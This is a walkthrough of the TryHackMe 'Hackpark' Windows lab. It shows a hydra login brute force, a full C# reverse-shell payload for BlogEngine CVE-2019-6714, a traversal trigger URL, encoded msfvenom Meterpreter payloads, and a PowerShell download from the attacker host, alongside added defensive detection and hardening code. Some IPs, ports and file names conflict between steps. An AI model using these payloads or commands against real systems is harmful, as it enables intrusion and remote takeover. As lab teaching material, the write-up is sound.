How I Solved the Hackpark Walkthrough (TryHackMe)


CHALLENGE OVERVIEW

  • Link: hackpark
  • Difficulty: Medium
  • Target: user and root flags on a Windows machine
  • Highlight: using Metasploit to quickly and easily gain root access
  • Tools: nmap, dirb, hydra, burpsuite, msfvenom
  • Tags: RCE (remote code execution), Windows

BACKGROUND

In this box, we will hack into a Windows machine using standard pen-testing tools. There are two options for solving the box.

I’ll demonstrate in this post how to hack into the box with Metasploit. In the upcoming Hackpark Part II post, I’ll show how to find the flags without using Metasploit.

ATTACK MAP

IPs

First, let’s record our IP addresses as bash variables using export, so we can reuse them in later commands.

export myIP=10.6.2.23
export targetIP=10.10.72.99

ENUMERATION

We’ll kick things off with a dirb scan and an nmap scan.

/admin is discovered on targetIP with dirb.

┌─[kalisurfer@parrot]─[~]
└──╼ $nmap 10.10.208.243
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 16:03 EST
Nmap scan report for 10.10.208.243
Host is up (0.098s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server

The ms-wbt-server service looks interesting. A quick Google search shows that port 3389 is used for Windows Remote Desktop (RDP). We may come back to this later on in the hack.

PREPPING OUR COMMAND FOR HYDRA

Next, we’ll use Firefox’s developer tools to inspect the POST request that is sent when we attempt to log in to the /admin portal with generic credentials (admin:pass).

__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&ctl00%24MainContent%24LoginUser%24UserName=user&ctl00%24MainContent%24LoginUser%24Password=pass&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in

Next, we’ll build the hydra command that will brute-force our way into the admin portal, reusing the form field names and the __VIEWSTATE and __EVENTVALIDATION values captured above.

hydra -l admin -P /home/kalisurfer/hacking-tools/rockyou.txt 10.10.72.99 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
  • -l sets a single username (admin)
  • -P points to the password wordlist
  • http-post-form selects hydra’s module for HTTP POST login forms; its argument is the login path, the POST body with ^PASS^ as the placeholder hydra substitutes, and the failure string, separated by colons
  • :Login failed (at the end of the command) is the string hydra looks for in the response to recognise a failed login attempt

Results:

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-08 18:02:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.208.243:80/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 663.00 tries/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 active
[80][http-post-form] host: 10.10.208.243   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-08 18:03:43
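The defensive counterpart to the brute force above, as an added example that is not part of the original walkthrough: because the login page answers a wrong password with a normally rendered page containing "Login failed" (that is what hydra matches on), status codes do not reveal the attack, so this script flags the volume of POSTs to /Account/login.aspx per client and minute. The log lines, the field subset and the threshold are constructed for the example.

```python
# Added example (not from the original walkthrough): detect a hydra-style
# login brute force in IIS W3C log lines by counting POSTs to the login
# endpoint per (client IP, minute). Failed logins come back as a normally
# rendered page with "Login failed" in the body, so sc-status alone is no signal.
from collections import Counter
from datetime import datetime

LOGIN_PATH = "/Account/login.aspx"
# hydra above ran at ~663 tries/min; a human retyping a password manages a handful.
THRESHOLD_PER_MINUTE = 20

# Constructed sample (assumed field subset: date time c-ip cs-method cs-uri-stem
# sc-status): one legitimate login plus a 30-request burst from one source.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem sc-status",
    "2023-01-08 23:01:50 10.10.5.7 POST /Account/login.aspx 302",
] + [
    f"2023-01-08 23:02:{s:02d} 10.6.2.23 POST /Account/login.aspx 200"
    for s in range(0, 60, 2)
]


def parse_line(line):
    """Return (timestamp, client ip, method, uri stem, status) or None for comments/blank lines."""
    if line.startswith("#") or not line.strip():
        return None
    date, time, c_ip, method, uri_stem, status = line.split()[:6]
    ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    return ts, c_ip, method, uri_stem, int(status)


def login_posts_per_minute(lines):
    """Count POSTs to the login page, bucketed by (client IP, 'YYYY-MM-DD HH:MM')."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, c_ip, method, uri_stem, _status = rec
        if method == "POST" and uri_stem.lower() == LOGIN_PATH.lower():
            counts[(c_ip, ts.strftime("%Y-%m-%d %H:%M"))] += 1
    return counts


def flag_bruteforce(lines, threshold=THRESHOLD_PER_MINUTE):
    """Return the client IPs that exceeded the per-minute threshold, sorted."""
    counts = login_posts_per_minute(lines)
    return sorted({ip for (ip, _minute), n in counts.items() if n >= threshold})
```

In a real deployment the same counting applies to the web server's access log; rate limiting or lockout on the login endpoint removes the condition that made the 14-million-word list viable.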

INITIAL FOOTHOLD

Now we can log in with the username:password combination admin:1qaz2wsx.

We are shown an admin dashboard. Searching for BlogEngine on exploit-db.com reveals a possible exploit for us to use: CVE-2019-6714.

To use the exploit, we need to upload the exploit’s payload (PostView.ascx) through the admin file manager. We can then trigger it by requesting the following address in our browser, where the theme parameter points back to the upload directory:

http://10.10.172.59/?theme=../../App_Data/files

And we should then be able to catch the revshell with a netcat listener.
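The two missing checks that make the upload-then-traverse sequence above work, shown as an added Python example rather than BlogEngine’s own C# code: the theme parameter is joined onto the themes directory unchecked, so ../../App_Data/files walks out of it, and the file manager accepts server-executable .ascx content. The themes directory and the image allowlist are assumptions for the example.

```python
# Added example (not BlogEngine's code): the unchecked join behind the
# ?theme=../../App_Data/files trigger, beside the checks that close it.
import os
import re

THEMES_DIR = "/srv/blog/themes"                      # assumed layout
THEME_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")      # what a theme name may look like
UPLOAD_ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".webp"}  # assumed policy


def theme_file(theme):
    """Vulnerable pattern: request parameter joined onto the themes directory
    with no validation. '..' segments (or an absolute path) leave THEMES_DIR."""
    return os.path.normpath(os.path.join(THEMES_DIR, theme, "PostView.ascx"))


def inside_themes_dir(path):
    """True only if the normalised path is THEMES_DIR itself or below it.
    Production code should also resolve symlinks (os.path.realpath) first."""
    return os.path.commonpath([THEMES_DIR, path]) == THEMES_DIR


def safe_theme_file(theme):
    """Hardened version: allowlist the name, then confirm the resolved path
    stays inside THEMES_DIR. Either check alone blocks the traversal; both is
    defence in depth."""
    if not THEME_NAME.fullmatch(theme):
        raise ValueError(f"invalid theme name: {theme!r}")
    path = theme_file(theme)
    if not inside_themes_dir(path):
        raise ValueError(f"theme path escapes themes directory: {path}")
    return path


def upload_allowed(filename):
    """File-manager check: server-executable ASP.NET content (.ascx, .aspx)
    must never be writable through an upload endpoint; allow images only."""
    return os.path.splitext(filename)[1].lower() in UPLOAD_ALLOWLIST
```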

PREPARE THE PAYLOAD

We need to change the IP address and port in the TcpClient line of the following payload to match our attack machine and listener, and then save it as PostView.ascx.

payload:
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
    static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.6.2.23", 8888)) {
            using(System.IO.Stream stream = client.GetStream()) {
                using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);

                    StringBuilder strInput = new StringBuilder();

                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();

                    while(true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();

        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

SET UP THE NC LISTENER

Next, let’s spin up a netcat listener with the command:

nc -lnvp 8888

TRIGGER THE REV SHELL

Now that our malicious payload is uploaded and our netcat listener is running, all we have to do is navigate to the following address, and we should catch the reverse shell as planned.

http://10.10.172.59/?theme=../../App_Data/files

And … bingo! We’ve caught the revshell and we are in with our initial foothold!

UPGRADE THE SHELL TO METERPRETER

Now that we are in the shell, we can work on upgrading it to a Meterpreter shell. This will allow us to use many powerful tools within the Metasploit Framework.

We’ll use python3 to spin up a simple HTTP server that serves the Meterpreter reverse shell payload file to the Windows machine.

USE MSFVENOM TO CREATE REVSHELL PAYLOAD

The following command will create the payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe

The payload did not work on my machine, so I added encoding using a standard encoder, shikata ga nai (x86/shikata_ga_nai).

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe

TRANSFER THE MSFVENOM PAYLOAD TO TARGET

Next, we’ll transfer the encoded payload from our attack machine to the target machine. 

Let’s navigate to the directory that holds the payload.exe on our attack machine. Then we’ll spin up a simple HTTP server using the command:

python3 -m http.server

Then we’ll grab the file and copy it to our target Windows machine from the HTTP server:

powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Windows\Temp\winPEASx64.exe'"

Notice that we save the file in the Temp directory because we have write permissions there. This is a common configuration that can be leveraged as an unprivileged user.

CATCH THE METERPRETER SHELL WITH METASPLOIT

First, let’s fire up Metasploit console:

msfconsole

Then load the handler:

use exploit/multi/handler

Next, we need to set LHOST and LPORT to match the values used with msfvenom, and set the payload to windows/meterpreter/reverse_tcp.

Now that everything is set up correctly, we can run it to boot up the meterpreter listener:

run

Then execute the uploaded payload (shell.exe) on the target machine to throw a Meterpreter reverse shell.

And we got it! The lower left console window shows the meterpreter shell.

Now that we are running a meterpreter shell in msfconsole we can quickly pwn the system with:

getsystem

And view the system information:

sysinfo

We can view our user information with the command:

getuid

Since we are already NT Authority, thanks to the magical powers of Metasploit, we don’t need to do anything else except locate and retrieve the two flags.

We found both flags!

In the next post, I’ll walk you through an alternate solution to this box without needing Metasploit.